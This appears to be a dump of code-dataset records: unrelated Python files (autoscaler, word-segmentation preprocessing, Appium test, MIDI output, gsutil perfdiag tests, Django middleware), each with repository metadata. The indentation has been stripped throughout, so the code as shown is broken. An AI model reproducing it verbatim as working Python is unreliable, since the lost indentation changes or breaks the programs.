cur = max(self.qty, self.min_concurrency)
if cur < procs:
self.scale_down(procs - cur)
return True
def maybe_scale(self, req=None):
if self._maybe_scale(req):
self.pool.maintain_pool()
def update(self, max=None, min=None):
with self.mutex:
if max is not None:
if max < self.processes:
self._shrink(self.processes - max)
self.max_concurrency = max
if min is not None:
if min > self.processes:
self._grow(min - self.processes)
self.min_concurrency = min
return self.max_concurrency, self.min_concurrency
def force_scale_up(self, n):
with self.mutex:
new = self.processes + n
if new > self.max_concurrency:
self.max_concurrency = new
self._grow(n)
def force_scale_down(self, n):
with self.mutex:
new = self.processes - n
if new < self.min_concurrency:
self.min_concurrency = max(new, 0)
self._shrink(min(n, self.processes))
def scale_up(self, n):
self._last_scale_up = monotonic()
return self._grow(n)
def scale_down(self, n):
if self._last_scale_up and (
monotonic() - self._last_scale_up > self.keepalive):
return self._shrink(n)
def _grow(self, n):
info('Scaling up %s processes.', n)
self.pool.grow(n)
self.worker.consumer._update_prefetch_count(n)
def _shrink(self, n):
info('Scaling down %s processes.', n)
try:
self.pool.shrink(n)
except ValueError:
debug("Autoscaler won't scale down: all processes busy.")
except Exception as exc:
error('Autoscaler: scale_down: %r', exc, exc_info=True)
self.worker.consumer._update_prefetch_count(-n)
def info(self):
return {
'max': self.max_concurrency,
'min': self.min_concurrency,
'current': self.processes,
'qty': self.qty,
}
@property
def qty(self):
return len(state.reserved_requests)
@property
def processes(self):
return self.pool.num_processes
|
[
"lavanya.ramkumar99@gmail.com"
] |
lavanya.ramkumar99@gmail.com
|
466965dcbb3fd44bda5de7f81e42d31ae7e715c4
|
c5a360ae82b747307b94720e79e2e614d0c9f70f
|
/step2_process_data_format_by_keras.py
|
818e00fc1f1b23a04f91efd4f4c676aa8a55aca4
|
[] |
no_license
|
gswyhq/chinese_wordseg_keras
|
cf99156773d4555acddf3163457f9bc224a16477
|
7f1de5fb1e3372fac9df75d3d839aa92fa4601c9
|
refs/heads/master
| 2020-05-02T13:49:32.099129
| 2019-03-28T14:07:46
| 2019-03-28T14:11:49
| 177,993,542
| 0
| 0
| null | 2019-03-27T12:49:37
| 2019-03-27T12:49:37
| null |
UTF-8
|
Python
| false
| false
| 4,090
|
py
|
#!/usr/bin/python3
# coding=utf-8
# ### 基于深度学习的中文分词尝试
# - 基于word2vec + 神经网络进行中文分词
# - 步骤1:使用的是sogou的语料库建立初始的字向量。
# - 步骤2:读入有标注的训练语料库,处理成keras需要的数据格式。
# - 步骤3:根据训练数据建模,使用CNN方法
# - 步骤4:读入无标注的检验语料库,用CNN模型进行分词标注
# - 步骤5:检查最终的效果
# - 参考资料:[中文分词资源](http://www.52nlp.cn/%E4%B8%AD%E6%96%87%E5%88%86%E8%AF%8D%E5%85%A5%E9%97%A8%E4%B9%8B%E8%B5%84%E6%BA%90)
# [中文分词标注法](http://www.52nlp.cn/the-character-based-tagging-method-of-chinese-word-segmentation) [word2vec原理](http://suanfazu.com/t/word2vec-zhong-de-shu-xue-yuan-li-xiang-jie-duo-tu-wifixia-yue-du/178) [基于word2vec的中文分词](http://blog.csdn.net/itplus/article/details/17122431)
# - 步骤1:先用sogou语料库生成中文的单字向量,以备后用
import codecs
import numpy as np
from pickle import dump,load
# - 步骤2:训练数据读取和转换
init_weight_wv= load(open('init_weight.pickle','rb'))
word2idx = load(open('word2idx.pickle', 'rb'))
idx2word = load(open('idx2word.pickle', 'rb'))
# 读取数据,将格式进行转换为带四种标签 S B M E
input_file = './data/icwb2-data/training/msr_training.utf8'
output_file = './data/icwb2-data/training/msr_training.tagging.utf8'
# 用于字符标记的4个标签:B(开始),E(结束),M(中),S(单)
def character_tagging(input_file, output_file):
input_data = codecs.open(input_file, 'r', 'utf-8')
output_data = codecs.open(output_file, 'w', 'utf-8')
for line in input_data.readlines():
word_list = line.strip().split()
for word in word_list:
if len(word) == 1:
output_data.write(word + "/S ")
else:
output_data.write(word[0] + "/B ")
for w in word[1:len(word)-1]:
output_data.write(w + "/M ")
output_data.write(word[len(word)-1] + "/E ")
output_data.write("\n")
input_data.close()
output_data.close()
character_tagging(input_file, output_file)
# 定义'U'为未登陆新字, 空格为两头padding用途,并增加两个相应的向量表示
char_num = len(init_weight_wv)
idx2word[char_num] = u'U'
word2idx[u'U'] = char_num
idx2word[char_num+1] = u' '
word2idx[u' '] = char_num+1
init_weight_wv.append(np.random.randn(100,))
init_weight_wv.append(np.zeros(100,))
# In[21]:
# 分离word 和 label
with open(output_file) as f:
lines = f.readlines()
train_line = [[w[0] for w in line.split()] for line in lines]
train_label = [w[2] for line in lines for w in line.split()]
# In[17]:
# 文档转数字list
def sent2num(sentence, word2idx = word2idx, context = 7):
predict_word_num = []
for w in sentence:
# 文本中的字如果在词典中则转为数字,如果不在则设置为'U
if w in word2idx:
predict_word_num.append(word2idx[w])
else:
predict_word_num.append(word2idx[u'U'])
# 首尾padding
num = len(predict_word_num)
pad = int((context-1)*0.5)
for i in range(pad):
predict_word_num.insert(0,word2idx[u' '] )
predict_word_num.append(word2idx[u' '] )
train_x = []
for i in range(num):
train_x.append(predict_word_num[i:i+context])
return train_x
# In[53]:
# 输入字符list,输出数字list
sent2num(train_line[0])
# In[60]:
# 将所有训练文本转成数字list
train_word_num = []
for line in train_line:
train_word_num.extend(sent2num(line))
# In[62]:
print(len(train_word_num))
print(len(train_label))
# In[64]:
dump(train_word_num, open('train_word_num.pickle', 'wb'))
#train_word_num = load(open('train_word_num.pickle','rb'))
dump(train_label, open('train_label.pickle', 'wb'))
dump(sent2num, open('sent2num.pickle', 'wb'))
# In[22]:
def main():
pass
if __name__ == '__main__':
main()
|
[
"gswyhq@126.com"
] |
gswyhq@126.com
|
d1ce2f47b5065975e22b593396c700d64efe1e9f
|
8a3e2d3aa46224bb0fa8ff2351f3a0bb339b0abd
|
/my_site/campaign/forms.py
|
3f7e74dbce84eaa30d8118c3816d03edc36af25e
|
[] |
no_license
|
Mosaab4/Task
|
85ceeab56b3ffe57049d3474c97964d51ace3471
|
4d0d250c06e97a74ce723e91addc9c17faef5b4e
|
refs/heads/master
| 2020-03-23T15:33:53.417503
| 2018-07-20T21:37:14
| 2018-07-20T21:37:14
| 141,757,012
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 512
|
py
|
from django import forms
from django.forms import SelectDateWidget
from .models import Campaign
class CampaignForm(forms.ModelForm):
stop_date = forms.DateField(
widget=forms.DateInput(
attrs={
'type': 'date',
'class': 'form-control'
}
)
)
class Meta:
model = Campaign
fields = (
'name',
'status',
'type',
'stop_date',
'description',
)
|
[
"musab.ehab@gmail.com"
] |
musab.ehab@gmail.com
|
b8f92479cf86e0f5872b64f2bc3d32b9b1e0f0a4
|
32eeb97dff5b1bf18cf5be2926b70bb322e5c1bd
|
/benchmark/radiocell/testcase/allpreferencecases/precase_log.py
|
5de436ca260389960142a69aa2c35fe93a6bb02c
|
[] |
no_license
|
Prefest2018/Prefest
|
c374d0441d714fb90fca40226fe2875b41cf37fc
|
ac236987512889e822ea6686c5d2e5b66b295648
|
refs/heads/master
| 2021-12-09T19:36:24.554864
| 2021-12-06T12:46:14
| 2021-12-06T12:46:14
| 173,225,161
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,780
|
py
|
#coding=utf-8
import os
import subprocess
import time
import traceback
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException, WebDriverException
desired_caps = {
'platformName' : 'Android',
'deviceName' : 'Android Emulator',
'platformVersion' : '4.4',
'appPackage' : 'org.openbmap',
'appActivity' : 'org.openbmap.activities.StartscreenActivity',
'resetKeyboard' : True,
'androidCoverage' : 'org.openbmap/org.openbmap.JacocoInstrumentation',
'noReset' : True
}
def command(cmd, timeout=5):
p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
time.sleep(timeout)
p.terminate()
return
def getElememt(driver, str) :
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str)
return element
def getElememtBack(driver, str1, str2) :
for i in range(0, 2, 1):
try:
element = driver.find_element_by_android_uiautomator(str1)
except NoSuchElementException:
time.sleep(1)
else:
return element
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str2)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str2)
return element
def swipe(driver, startxper, startyper, endxper, endyper) :
size = driver.get_window_size()
width = size["width"]
height = size["height"]
try:
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=1000)
except WebDriverException:
time.sleep(1)
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=1000)
return
def scrollToFindElement(driver, str) :
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str)
elements = driver.find_elements_by_android_uiautomator(str)
if (len(elements) > 1) :
for temp in elements :
if temp.get_attribute("enabled") == "true" :
element = temp
break
except NoSuchElementException:
swipe(driver, 0.5, 0.55, 0.5, 0.2)
else :
return element
for i in range(0, 4, 1):
try:
element = driver.find_element_by_android_uiautomator(str)
elements = driver.find_elements_by_android_uiautomator(str)
if (len(elements) > 1):
for temp in elements:
if temp.get_attribute("enabled") == "true":
element = temp
break
except NoSuchElementException:
swipe(driver, 0.5, 0.2, 0.5, 0.55)
else :
return element
return
def scrollToClickElement(driver, str) :
element = scrollToFindElement(driver, str)
if element is None :
return
else :
element.click()
def clickInList(driver, str) :
element = None
if (str is None) :
candidates = driver.find_elements_by_class_name("android.widget.CheckedTextView")
if len(candidates) >= 1 and checkWindow(driver):
element = candidates[len(candidates)-1]
else :
element = scrollToFindElement(driver, str)
if element is not None :
element.click()
else :
if checkWindow(driver) :
driver.press_keycode(4)
def clickOnCheckable(driver, str, value = "true") :
parents = driver.find_elements_by_class_name("android.widget.LinearLayout")
for parent in parents:
try :
parent.find_element_by_android_uiautomator(str)
lists = parent.find_elements_by_class_name("android.widget.LinearLayout")
if len(lists) == 1 :
innere = parent.find_element_by_android_uiautomator("new UiSelector().checkable(true)")
nowvalue = innere.get_attribute("checked")
if (nowvalue != value) :
innere.click()
break
except NoSuchElementException:
continue
def typeText(driver, value) :
element = getElememt(driver, "new UiSelector().className(\"android.widget.EditText\")")
element.clear()
element.send_keys(value)
enterelement = getElememt(driver, "new UiSelector().text(\"OK\")")
if (enterelement is None) :
if checkWindow(driver):
driver.press_keycode(4)
else :
enterelement.click()
def checkWindow(driver) :
dsize = driver.get_window_size()
nsize = driver.find_element_by_class_name("android.widget.FrameLayout").size
if dsize['height'] > nsize['height']:
return True
else :
return False
def conscript(driver):
try:
driver.find_element_by_android_uiautomator("new UiSelector().text(\"OK\")").click()
time.sleep(0.1)
except NoSuchElementException:
time.sleep(0.1)
return
# preference setting and exit
try :
starttime = time.time()
driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)
os.popen("adb shell am start -n org.openbmap/org.openbmap.activities.AdvancedSettingsActivity -a test")
scrollToClickElement(driver, "new UiSelector().text(\"Ignore low battery\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Ignore low battery\")", "true")
scrollToClickElement(driver, "new UiSelector().text(\"Cleanup old sessions\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Cleanup old sessions\")", "true")
scrollToClickElement(driver, "new UiSelector().text(\"On export, create a GPX file locally on your device\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"On export, create a GPX file locally on your device\")", "true")
scrollToClickElement(driver, "new UiSelector().text(\"GPX verbosity\")")
clickInList(driver, "new UiSelector().text(\"Waypoints only\")")
conscript(driver)
scrollToClickElement(driver, "new UiSelector().text(\"Wireless scan mode\")")
clickInList(driver, "new UiSelector().text(\"Full power mode\")")
conscript(driver)
scrollToClickElement(driver, "new UiSelector().text(\"Anonymise SSID in upload files\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Anonymise SSID in upload files\")", "true")
scrollToClickElement(driver, "new UiSelector().text(\"Skip upload\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Skip upload\")", "true")
scrollToClickElement(driver, "new UiSelector().text(\"Keep uploaded files\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Keep uploaded files\")", "true")
driver.press_keycode(4)
time.sleep(2)
os.popen("adb shell am start -n org.openbmap/org.openbmap.activities.SettingsActivity -a test")
scrollToClickElement(driver, "new UiSelector().text(\"Anonymous upload\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Anonymous upload\")", "true")
scrollToClickElement(driver, "new UiSelector().text(\"Save Cells\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Save Cells\")", "false")
scrollToClickElement(driver, "new UiSelector().text(\"Save WiFis\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Save WiFis\")", "false")
scrollToClickElement(driver, "new UiSelector().text(\"Keep screen on\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Keep screen on\")", "false")
driver.press_keycode(4)
time.sleep(2)
except Exception, e:
print 'FAIL'
print 'str(e):\t\t', str(e)
print 'repr(e):\t', repr(e)
print traceback.format_exc()
else:
print 'OK'
finally:
cpackage = driver.current_package
endtime = time.time()
print 'consumed time:', str(endtime - starttime), 's'
command("adb shell am broadcast -a com.example.pkg.END_EMMA --es name \"preference_pre\"")
jacocotime = time.time()
print 'jacoco time:', str(jacocotime - endtime), 's'
driver.quit()
|
[
"prefest2018@gmail.com"
] |
prefest2018@gmail.com
|
d600b8b2c4530936de8246363f50622650126ebf
|
facb8b9155a569b09ba66aefc22564a5bf9cd319
|
/wp2/era5_scripts/02_preprocessing/concat82/62-tideGauge.py
|
f2b56a3028ad9bd3ebd829ae2f793963efbc05f3
|
[] |
no_license
|
moinabyssinia/modeling-global-storm-surges
|
13e69faa8f45a1244a964c5de4e2a5a6c95b2128
|
6e385b2a5f0867df8ceabd155e17ba876779c1bd
|
refs/heads/master
| 2023-06-09T00:40:39.319465
| 2021-06-25T21:00:44
| 2021-06-25T21:00:44
| 229,080,191
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,480
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue May 13 10:02:00 2020
---------------------------------------------------------
This script concatenates yearly predictor files
Browses the predictor folders for the chosen TG
Concatenates the yearly csvs for the chosen predictor
Saves the concatenated csv in a separate directory
---------------------------------------------------------
@author: Michael Tadesse
"""
#%% import packages
import os
import pandas as pd
#%% define directories
home = '/lustre/fs0/home/mtadesse/erafive_localized'
out_path = '/lustre/fs0/home/mtadesse/eraFiveConcat'
#cd to the home dir to get TG information
os.chdir(home)
tg_list = os.listdir()
x = 62
y = 63
#looping through TGs
for t in range(x, y):
tg = tg_list[t]
print(tg)
#concatenate folder paths
os.chdir(os.path.join(home, tg))
#defining the folders for predictors
#choose only u, v, and slp
where = os.getcwd()
csv_path = {'slp' : os.path.join(where, 'slp'),\
"wnd_u": os.path.join(where, 'wnd_u'),\
'wnd_v' : os.path.join(where, 'wnd_v')}
#%%looping through predictors
for pred in csv_path.keys():
os.chdir(os.path.join(home, tg))
# print(tg, ' ', pred, '\n')
#cd to the chosen predictor
os.chdir(pred)
#%%looping through the yearly csv files
count = 1
for yr in os.listdir():
print(pred, ' ', yr)
if count == 1:
dat = pd.read_csv(yr)
# print('original size is: {}'.format(dat.shape))
else:
#remove the header of the subsequent csvs before merging
# dat_yr = pd.read_csv(yr, header=None).iloc[1:,:]
dat_yr = pd.read_csv(yr)
dat_yr.shape
dat = pd.concat([dat, dat_yr], axis = 0)
# print('concatenated size is: {}'.format(dat.shape))
count+=1
print(dat.shape)
#saving concatenated predictor
#cd to the saving location
os.chdir(out_path)
#create/cd to the tg folder
try:
os.makedirs(tg)
os.chdir(tg) #cd to it after creating it
except FileExistsError:
#directory already exists
os.chdir(tg)
#save as csv
pred_name = '.'.join([pred, 'csv'])
dat.to_csv(pred_name)
|
[
"michaelg.tadesse@gmail.com"
] |
michaelg.tadesse@gmail.com
|
f8df77cd858240028f56eee704517225c5904b92
|
94a69d05880fdb03ad915a63f3575ff01e5df0e6
|
/isobar/io/midi/output.py
|
fbe793950ad0b3554dc0d03d9073936ce9a6c46e
|
[
"MIT"
] |
permissive
|
ideoforms/isobar
|
06f2a5553b33e8185c6f9aed06224811589f7b70
|
12b03500ea882f17c3521700f7f74b0e36e4b335
|
refs/heads/master
| 2023-07-20T20:31:13.040686
| 2023-07-17T19:19:01
| 2023-07-17T19:19:01
| 2,155,202
| 320
| 53
|
MIT
| 2023-05-01T21:29:46
| 2011-08-04T15:12:03
|
Python
|
UTF-8
|
Python
| false
| false
| 3,799
|
py
|
import os
import mido
import logging
from ..output import OutputDevice
from ...exceptions import DeviceNotFoundException
from ...constants import MIDI_CLOCK_TICKS_PER_BEAT
log = logging.getLogger(__name__)
class MidiOutputDevice (OutputDevice):
def __init__(self, device_name=None, send_clock=False, virtual=False):
"""
Create a MIDI output device.
Use `isobar.get_midi_output_names()` to query all available devices.
Args:
device_name (str): The name of the target device to use.
The default MIDI output device name can also be specified
with the environmental variable ISOBAR_DEFAULT_MIDI_OUT.
send_clock (bool): Whether to send clock sync/reset messages.
virtual (bool): Whether to create a "virtual" rtmidi device.
"""
try:
if device_name is None:
device_name = os.getenv("ISOBAR_DEFAULT_MIDI_OUT")
self.midi = mido.open_output(device_name, virtual=virtual)
except (RuntimeError, SystemError, OSError):
raise DeviceNotFoundException("Could not find MIDI device")
self.send_clock = send_clock
log.info("Opened MIDI output: %s" % self.midi.name)
def start(self):
"""
Sends a MIDI start message to the output device.
"""
if self.send_clock:
msg = mido.Message("start")
self.midi.send(msg)
def stop(self):
"""
Sends a MIDI stop message to the output device.
"""
if self.send_clock:
msg = mido.Message("stop")
self.midi.send(msg)
@property
def ticks_per_beat(self):
"""
The number of clock ticks per beat.
For MIDI devices, which is fixed at the MIDI standard of 24.
"""
return MIDI_CLOCK_TICKS_PER_BEAT
def tick(self):
if self.send_clock:
msg = mido.Message("clock")
self.midi.send(msg)
def note_on(self, note=60, velocity=64, channel=0):
log.debug("[midi] Note on (channel = %d, note = %d, velocity = %d)" % (channel, note, velocity))
msg = mido.Message('note_on', note=int(note), velocity=int(velocity), channel=int(channel))
self.midi.send(msg)
def note_off(self, note=60, channel=0):
log.debug("[midi] Note off (channel = %d, note = %d)" % (channel, note))
msg = mido.Message('note_off', note=int(note), channel=int(channel))
self.midi.send(msg)
def all_notes_off(self):
log.debug("[midi] All notes off")
for channel in range(16):
for note in range(128):
msg = mido.Message('note_off', note=int(note), channel=int(channel))
self.midi.send(msg)
def control(self, control=0, value=0, channel=0):
log.debug("[midi] Control (channel %d, control %d, value %d)" % (channel, control, value))
msg = mido.Message('control_change', control=int(control), value=int(value), channel=int(channel))
self.midi.send(msg)
def program_change(self, program=0, channel=0):
log.debug("[midi] Program change (channel %d, program_change %d)" % (channel, program))
msg = mido.Message('program_change', program=int(program), channel=int(channel))
self.midi.send(msg)
def pitch_bend(self, pitch=0, channel=0):
log.debug("[midi] Pitch bend (channel %d, pitch %d)" % (channel, pitch))
msg = mido.Message('pitchwheel', pitch=int(pitch), channel=int(channel))
self.midi.send(msg)
def set_song_pos(self, pos=0):
msg = mido.Message('songpos', pos=pos)
self.midi.send(msg)
def __del__(self):
if hasattr(self, "midi"):
del self.midi
|
[
"daniel@jones.org.uk"
] |
daniel@jones.org.uk
|
7120668501fd24173b3eeac50a49ced2c1bd7cea
|
39fbf1f554651f089dbf8478f009e38a2cbb7c25
|
/RL/analyze.random-search.py
|
282c8597a966b866b1b837a297a921ce6bfac83d
|
[
"Apache-2.0"
] |
permissive
|
Libardo1/icnn
|
20b323aed5a3975c8083fb8f6234305f8cd275d1
|
2056ca88d0b0dac4d8ee1a48a8b8a9f676bafd4f
|
refs/heads/master
| 2021-01-20T15:23:06.016978
| 2016-08-01T19:35:32
| 2016-08-01T19:35:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,154
|
py
|
#!/usr/bin/env python3
import argparse
import os
import sys
import shutil
from subprocess import Popen, PIPE
import json
import operator
import numpy as np
import numpy.random as npr
pythonCmd = 'python3'
rlDir = os.path.dirname(os.path.realpath(__file__))
plotSrc = os.path.join(rlDir, 'plot-all.py')
mainSrc = os.path.join(rlDir, 'src', 'main.py')
all_algs = ['DDPG', 'NAF', 'ICNN']
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--expDir', type=str, default='output.random-search')
args = parser.parse_args()
bestParams, bestVals = {}, {}
for task in os.listdir(args.expDir):
taskDir = os.path.join(args.expDir, task)
if os.path.isdir(taskDir):
bestParams[task], bestVals[task] = analyzeTask(taskDir)
orgTableP = os.path.join(args.expDir, 'table.org')
with open(orgTableP, 'w') as f:
f.write('| Task | DDPG | NAF | ICNN |\n')
f.write('|------+------+-----+------|\n')
for task, algs in sorted(bestVals.items()):
bestAlg = sorted(algs.items(), key=operator.itemgetter(1),
reverse=True)[0][0]
def getStr(alg):
s = '{:.2f} ({:.2f})'.format(algs[alg][0], int(algs[alg][1]))
if alg == bestAlg:
s = '*{}*'.format(s)
return s
f.write('| {:s} | {} | {} | {} |\n'.format(
task, getStr('DDPG'), getStr('NAF'), getStr('ICNN')))
f.flush()
print('Created {}'.format(orgTableP))
texTableP = os.path.join(args.expDir, 'table.tex')
os.system('pandoc {} --to latex --output {}'.format(orgTableP, texTableP))
for task, algs in bestParams.items():
for alg, params in algs.items():
del params['copy']
del params['env']
del params['force']
del params['gdb']
del params['gymseed']
del params['model']
del params['monitor']
del params['npseed']
del params['outdir']
del params['summary']
del params['tfseed']
del params['thread']
bestParamsP = os.path.join(args.expDir, 'bestParams.json')
with open(bestParamsP, 'w') as f:
json.dump(bestParams, f, indent=2, sort_keys=True)
print('Created {}'.format(bestParamsP))
def analyzeTask(taskDir):
bestParams = {}
bestVals = {}
print('=== {}'.format(taskDir))
with open(os.path.join(taskDir, 'analysis.txt'), 'w') as f:
for alg in all_algs:
algDir = os.path.join(taskDir, alg)
if os.path.exists(algDir):
f.write('\n=== {}\n\n'.format(alg))
exps = {}
for exp in sorted(os.listdir(algDir)):
expDir = os.path.join(algDir, exp)
testData = np.loadtxt(os.path.join(expDir, 'test.log'))
testRew = testData[:,1]
N = 10
if np.any(np.isnan(testRew)) or testRew.size <= N:
continue
testRew_ = np.array([sum(testRew[i-N:i])/N for
i in range(N, len(testRew))])
exps[exp] = [testRew_[-1], testRew_.sum()]
f.write((' + Experiment {}: Final rolling reward of {} '+
'with a cumulative reward of {}\n').format(
*([exp] + exps[exp])))
s = sorted(exps.items(), key=operator.itemgetter(1), reverse=True)
best = s[0]
bestExp = best[0]
f.write('\n--- Best of {} obtained in experiment {}\n'.format(
best[1], bestExp))
flagsP = os.path.join(algDir, bestExp, 'flags.json')
with open(flagsP, 'r') as flagsF:
f.write(flagsF.read()+'\n')
flagsF.seek(0)
flags = json.load(flagsF)
bestParams[alg] = flags
bestVals[alg] = best[1]
return bestParams, bestVals
if __name__=='__main__':
main()
|
[
"bamos@cs.cmu.edu"
] |
bamos@cs.cmu.edu
|
1e12863ed3a72096532a03ece32b12e9211e3a96
|
a59d55ecf9054d0750168d3ca9cc62a0f2b28b95
|
/platform/gsutil/gslib/tests/test_perfdiag.py
|
154b60919fd93d78dc4900e94ebc93c1dbbbc19d
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
bopopescu/google-cloud-sdk
|
bb2746ff020c87271398196f21a646d9d8689348
|
b34e6a18f1e89673508166acce816111c3421e4b
|
refs/heads/master
| 2022-11-26T07:33:32.877033
| 2014-06-29T20:43:23
| 2014-06-29T20:43:23
| 282,306,367
| 0
| 0
|
NOASSERTION
| 2020-07-24T20:04:47
| 2020-07-24T20:04:46
| null |
UTF-8
|
Python
| false
| false
| 4,129
|
py
|
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Integration tests for perfdiag command."""
import socket
import gslib.tests.testcase as testcase
from gslib.tests.util import ObjectToURI as suri
from gslib.tests.util import unittest
from gslib.util import IS_WINDOWS
class TestPerfDiag(testcase.GsUtilIntegrationTestCase):
"""Integration tests for perfdiag command."""
# We want to test that perfdiag works both when connecting to the standard gs
# endpoint, and when connecting to a specific IP or host while setting the
# host header. For the 2nd case we resolve storage.googleapis.com to a
# specific IP and connect to that explicitly.
_gs_ip = socket.gethostbyname('storage.googleapis.com')
_custom_endpoint_flags = [
'-o', 'Credentials:gs_host=' + _gs_ip,
'-o', 'Credentials:gs_host_header=storage.googleapis.com',
# TODO: gsutil-beta: Add host header support for JSON
'-o', 'Boto:https_validate_certificates=False']
def test_latency(self):
bucket_uri = self.CreateBucket()
cmd = ['perfdiag', '-n', '1', '-t', 'lat', suri(bucket_uri)]
self.RunGsUtil(cmd)
if self.test_api == 'XML':
self.RunGsUtil(self._custom_endpoint_flags + cmd)
def _run_basic_wthru_or_rthru(self, test_name, num_processes, num_threads):
bucket_uri = self.CreateBucket()
cmd = ['perfdiag', '-n', str(num_processes * num_threads),
'-s', '1024', '-c', str(num_processes),
'-k', str(num_threads), '-t', test_name, suri(bucket_uri)]
self.RunGsUtil(cmd)
if self.test_api == 'XML':
self.RunGsUtil(self._custom_endpoint_flags + cmd)
def test_write_throughput_single_process_multi_thread(self):
self._run_basic_wthru_or_rthru('wthru', 1, 2)
@unittest.skipIf(IS_WINDOWS, 'Multiprocessing is not supported on Windows')
def test_write_throughput_multi_process_single_thread(self):
self._run_basic_wthru_or_rthru('wthru', 2, 1)
@unittest.skipIf(IS_WINDOWS, 'Multiprocessing is not supported on Windows')
def test_write_throughput_multi_process_multi_thread(self):
self._run_basic_wthru_or_rthru('wthru', 2, 2)
def test_read_throughput_single_process_multi_thread(self):
self._run_basic_wthru_or_rthru('rthru', 1, 2)
@unittest.skipIf(IS_WINDOWS, 'Multiprocessing is not supported on Windows')
def test_read_throughput_multi_process_single_thread(self):
self._run_basic_wthru_or_rthru('rthru', 2, 1)
@unittest.skipIf(IS_WINDOWS, 'Multiprocessing is not supported on Windows')
def test_read_throughput_multi_process_multi_thread(self):
self._run_basic_wthru_or_rthru('rthru', 2, 2)
def test_input_output(self):
outpath = self.CreateTempFile()
bucket_uri = self.CreateBucket()
self.RunGsUtil(['perfdiag', '-o', outpath, '-n', '1', '-t', 'lat',
suri(bucket_uri)])
self.RunGsUtil(['perfdiag', '-i', outpath])
def test_invalid_size(self):
stderr = self.RunGsUtil(
['perfdiag', '-n', '1', '-s', 'foo', '-t', 'wthru', 'gs://foobar'],
expected_status=1, return_stderr=True)
self.assertIn('Invalid -s', stderr)
def test_toobig_size(self):
stderr = self.RunGsUtil(
['perfdiag', '-n', '1', '-s', '3pb', '-t', 'wthru', 'gs://foobar'],
expected_status=1, return_stderr=True)
self.assertIn('Maximum throughput file size', stderr)
def test_listing(self):
bucket_uri = self.CreateBucket()
stdout = self.RunGsUtil(
['perfdiag', '-n', '1', '-t', 'list', suri(bucket_uri)],
return_stdout=True)
self.assertIn('Number of listing calls made:', stdout)
|
[
"alfred.wechselberger@technologyhatchery.com"
] |
alfred.wechselberger@technologyhatchery.com
|
8e4474d37dbadeacda29af5e1b54ffe20ecd50a6
|
9789aaa94e4a321fed2a1f624ef180d938f1fe56
|
/src/common/appenginepatch/ragendja/sites/dynamicsite.py
|
6726a46f3ba6519e5807b3b081d1ea305ce0e818
|
[
"MIT",
"Apache-2.0"
] |
permissive
|
fantascy/snsanalytics
|
61ff6b8f384f0bd4be8f89a2a19101ad2cf1bc77
|
927f186c7f5a1d534e0ff7ce7aff46a0c1a36c51
|
refs/heads/master
| 2021-01-13T14:18:05.684839
| 2016-11-06T07:43:35
| 2016-11-06T07:43:35
| 72,827,547
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,871
|
py
|
from django.conf import settings
from django.core.cache import cache
from django.contrib.sites.models import Site
from ragendja.dbutils import db_create
from ragendja.pyutils import make_tls_property
_default_site_id = getattr(settings, 'SITE_ID', None)
SITE_ID = settings.__class__.SITE_ID = make_tls_property()
class DynamicSiteIDMiddleware(object):
"""Sets settings.SIDE_ID based on request's domain"""
def process_request(self, request):
# Ignore port if it's 80 or 443
if ':' in request.get_host():
domain, port = request.get_host().split(':')
try:
if int(port) not in (80, 443):
domain = request.get_host()
except:
pass
else:
domain = request.get_host().split(':')[0]
# We cache the SITE_ID
cache_key = 'Site:domain:%s' % domain
site = cache.get(cache_key)
if site:
SITE_ID.value = site
else:
site = Site.all().filter('domain =', domain).get()
if not site:
# Fall back to with/without 'www.'
if domain.startswith('www.'):
fallback_domain = domain[4:]
else:
fallback_domain = 'www.' + domain
site = Site.all().filter('domain =', fallback_domain).get()
# Add site if it doesn't exist
if not site and getattr(settings, 'CREATE_SITES_AUTOMATICALLY',
True):
site = db_create(Site, domain=domain, name=domain)
site.put()
# Set SITE_ID for this thread/request
if site:
SITE_ID.value = str(site.key())
else:
SITE_ID.value = _default_site_id
cache.set(cache_key, SITE_ID.value, 5*60)
|
[
"cong@snsanalytics.com"
] |
cong@snsanalytics.com
